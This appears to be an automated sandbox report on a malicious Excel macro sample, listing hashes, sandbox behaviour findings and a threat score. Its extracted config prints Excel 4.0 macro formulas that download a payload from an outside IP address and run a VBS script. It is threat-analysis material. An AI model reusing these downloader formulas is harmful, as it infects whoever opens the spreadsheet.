General
-
Target
7099f5e1d75a28cec1775de66911831d
-
Size
6KB
-
Sample
231222-fzffgshcbq
-
MD5
7099f5e1d75a28cec1775de66911831d
-
SHA1
4b581d87b66d557b82322296d2722574a926aea3
-
SHA256
1be2d1034a302dc9b5bcea93429a2793c03c8d115145fafe9aadaac69ffa534a
-
SHA512
264d30558010c3243456ed1c25185fd60b929dd3096460039596427a24cff516dc2ed7bcd467a4c084baceb972ceae898d5a20c6a537ba0b2ca9a6aebe9a29c6
-
SSDEEP
192:NDSuuSYbrA2OmmfRf8UhHFBFYuRb98y5y+V:NFu1M2wB1FYAb98y5N
Static task
static1
Behavioral task
behavioral1
Sample
7099f5e1d75a28cec1775de66911831d.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
7099f5e1d75a28cec1775de66911831d.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
=EXEC("wscript C:\zer\spp.vbs")
=HALT()
Targets
Target
7099f5e1d75a28cec1775de66911831d
Score
10/10
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-